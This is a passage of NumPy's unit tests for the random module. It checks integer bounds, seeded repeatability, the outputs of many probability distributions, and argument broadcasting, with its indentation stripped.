lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
try:
self.rfunc(lbnd, ubnd, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self):
# Don't use fixed seed
np.random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool_)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
import hashlib
# We use an md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '7dd3170d7aa461d201a65f8bcf3944b0',
'int16': '1b7741b80964bb190c50d541dca1cac1',
'int32': '4dc9fcc2b395577ebb51793e58ed1a05',
'int64': '17db902806f448331b5a758d7d2ee672',
'int8': '27dd30c4e08a797063dffac2490b0be6',
'uint16': '1b7741b80964bb190c50d541dca1cac1',
'uint32': '4dc9fcc2b395577ebb51793e58ed1a05',
'uint64': '17db902806f448331b5a758d7d2ee672',
'uint8': '27dd30c4e08a797063dffac2490b0be6'}
for dt in self.itype[1:]:
np.random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
np.random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_int64_uint64_corner_case(self):
# When stored in Numpy arrays, `lbnd` is cast
# as np.int64, and `ubnd` is cast as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it to be rounded down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1)
# None of these function calls should
# generate a ValueError now.
actual = np.random.randint(lbnd, ubnd, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_equal(sample.dtype, np.dtype(dt))
for dt in (bool, int, np.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_(not hasattr(sample, 'dtype'))
assert_equal(type(sample), dt)
class TestRandomDist(object):
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_rand(self):
np.random.seed(self.seed)
actual = np.random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
np.random.seed(self.seed)
actual = np.random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randint(self):
np.random.seed(self.seed)
actual = np.random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers(self):
np.random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
assert_(len(w) == 1)
desired = np.iinfo('l').max
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random_sample(self):
np.random.seed(self.seed)
actual = np.random.random_sample((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_choice_uniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False,
p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
np.random.seed(self.seed)
actual = np.random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = np.random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(np.random.choice(2, replace=True)))
assert_(np.isscalar(np.random.choice(2, replace=False)))
assert_(np.isscalar(np.random.choice(2, replace=True, p=p)))
assert_(np.isscalar(np.random.choice(2, replace=False, p=p)))
assert_(np.isscalar(np.random.choice([1, 2], replace=True)))
assert_(np.random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(np.random.choice(2, s, replace=True)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False)))
assert_(not np.isscalar(np.random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(np.random.choice([1, 2], s, replace=True)))
assert_(np.random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(np.random.choice(6, s, replace=True).shape, s)
assert_equal(np.random.choice(6, s, replace=False).shape, s)
assert_equal(np.random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(np.random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(np.random.choice(np.arange(6), s, replace=True).shape, s)
def test_bytes(self):
np.random.seed(self.seed)
actual = np.random.bytes(10)
desired = b'\x82Ui\x9e\xff\x97+Wf\xa5'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, 1),
("b", np.int32, 1)])]:
np.random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
np.random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
np.random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
np.random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_beta(self):
np.random.seed(self.seed)
actual = np.random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
np.random.seed(self.seed)
actual = np.random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
assert_array_equal(actual, desired)
def test_chisquare(self):
np.random.seed(self.seed)
actual = np.random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
np.random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = np.random.mtrand.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, np.random.dirichlet, p, float(1))
def test_exponential(self):
np.random.seed(self.seed)
actual = np.random.exponential(1.1234, size=(3, 2))
desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(np.random.exponential(scale=0), 0)
assert_raises(ValueError, np.random.exponential, scale=-0.)
def test_f(self):
np.random.seed(self.seed)
actual = np.random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
np.random.seed(self.seed)
actual = np.random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(np.random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, np.random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
np.random.seed(self.seed)
actual = np.random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
assert_array_equal(actual, desired)
def test_gumbel(self):
np.random.seed(self.seed)
actual = np.random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(np.random.gumbel(scale=0), 0)
assert_raises(ValueError, np.random.gumbel, scale=-0.)
def test_hypergeometric(self):
np.random.seed(self.seed)
actual = np.random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = np.random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = np.random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
np.random.seed(self.seed)
actual = np.random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(np.random.laplace(scale=0), 0)
assert_raises(ValueError, np.random.laplace, scale=-0.)
def test_logistic(self):
np.random.seed(self.seed)
actual = np.random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
np.random.seed(self.seed)
actual = np.random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(np.random.lognormal(sigma=0), 1)
assert_raises(ValueError, np.random.lognormal, sigma=-0.)
def test_logseries(self):
np.random.seed(self.seed)
actual = np.random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
assert_array_equal(actual, desired)
def test_multinomial(self):
np.random.seed(self.seed)
actual = np.random.multinomial(20, [1/6.]*6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
np.random.seed(self.seed)
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = np.random.multivariate_normal(mean, cov, size)
desired = np.array([[[1.463620246718631, 11.73759122771936 ],
[1.622445133300628, 9.771356667546383]],
[[2.154490787682787, 12.170324946056553],
[1.719909438201865, 9.230548443648306]],
[[0.689515026297799, 9.880729819607714],
[-0.023054015651998, 9.201096623542879]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = np.random.multivariate_normal(mean, cov)
desired = np.array([0.895289569463708, 9.17180864067987])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, np.random.multivariate_normal, mean, cov)
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(np.random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises a ValueError with check_valid='raise'
assert_raises(ValueError, np.random.multivariate_normal, mean, cov,
check_valid='raise')
def test_negative_binomial(self):
np.random.seed(self.seed)
actual = np.random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
assert_array_equal(actual, desired)
def test_noncentral_chisquare(self):
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = np.random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[1.47145377828516666, 0.15052899268012659],
[0.00943803056963588, 1.02647251615666169],
[0.332334982684171, 0.15451287602753125]])
assert_array_almost_equal(actual, desired, decimal=14)
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
np.random.seed(self.seed)
actual = np.random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
np.random.seed(self.seed)
actual = np.random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(np.random.normal(scale=0), 0)
assert_raises(ValueError, np.random.normal, scale=-0.)
def test_pareto(self):
np.random.seed(self.seed)
actual = np.random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# http://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
np.random.seed(self.seed)
actual = np.random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, np.random.poisson, lamneg)
assert_raises(ValueError, np.random.poisson, [lamneg]*10)
assert_raises(ValueError, np.random.poisson, lambig)
assert_raises(ValueError, np.random.poisson, [lambig]*10)
def test_power(self):
np.random.seed(self.seed)
actual = np.random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
np.random.seed(self.seed)
actual = np.random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(np.random.rayleigh(scale=0), 0)
assert_raises(ValueError, np.random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
np.random.seed(self.seed)
actual = np.random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
np.random.seed(self.seed)
actual = np.random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
np.random.seed(self.seed)
actual = np.random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_0(self):
assert_equal(np.random.standard_gamma(shape=0), 0)
assert_raises(ValueError, np.random.standard_gamma, shape=-0.)
def test_standard_normal(self):
np.random.seed(self.seed)
actual = np.random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
np.random.seed(self.seed)
actual = np.random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
np.random.seed(self.seed)
actual = np.random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
np.random.seed(self.seed)
actual = np.random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = np.random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
np.random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, np.random.uniform, throwing_float, throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, np.random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
np.random.seed(self.seed)
actual = np.random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
np.random.seed(self.seed)
r = np.random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
np.testing.assert_(np.isfinite(r).all())
def test_wald(self):
np.random.seed(self.seed)
actual = np.random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
np.random.seed(self.seed)
actual = np.random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
assert_equal(np.random.weibull(a=0), 0)
assert_raises(ValueError, np.random.weibull, a=-0.)
def test_zipf(self):
np.random.seed(self.seed)
actual = np.random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
assert_array_equal(actual, desired)
class TestBroadcast(object):
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def setSeed(self):
np.random.seed(self.seed)
# TODO: Include test for randint once it can broadcast
# Can steal the test written in PR #6938
def test_uniform(self):
low = [0]
high = [1]
uniform = np.random.uniform
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
self.setSeed()
actual = uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
normal = np.random.normal
desired = np.array([2.2129019979039612,
2.1283977976520019,
1.8417114045748335])
self.setSeed()
actual = normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc * 3, bad_scale)
self.setSeed()
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
beta = np.random.beta
desired = np.array([0.19843558305989056,
0.075230336409423643,
0.24976865978980844])
self.setSeed()
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
self.setSeed()
actual = beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a, b * 3)
assert_raises(ValueError, beta, a, bad_b * 3)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
exponential = np.random.exponential
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
std_gamma = np.random.standard_gamma
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
gamma = np.random.gamma
desired = np.array([1.5221370731769048,
1.5277256455738331,
1.4248762625178359])
self.setSeed()
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
self.setSeed()
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
f = np.random.f
desired = np.array([0.80038951638264799,
0.86768719635363512,
2.7251095168386801])
self.setSeed()
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
self.setSeed()
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
nonc_f = np.random.noncentral_f
desired = np.array([9.1393943263705211,
13.025456344595602,
8.8018098359100545])
self.setSeed()
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
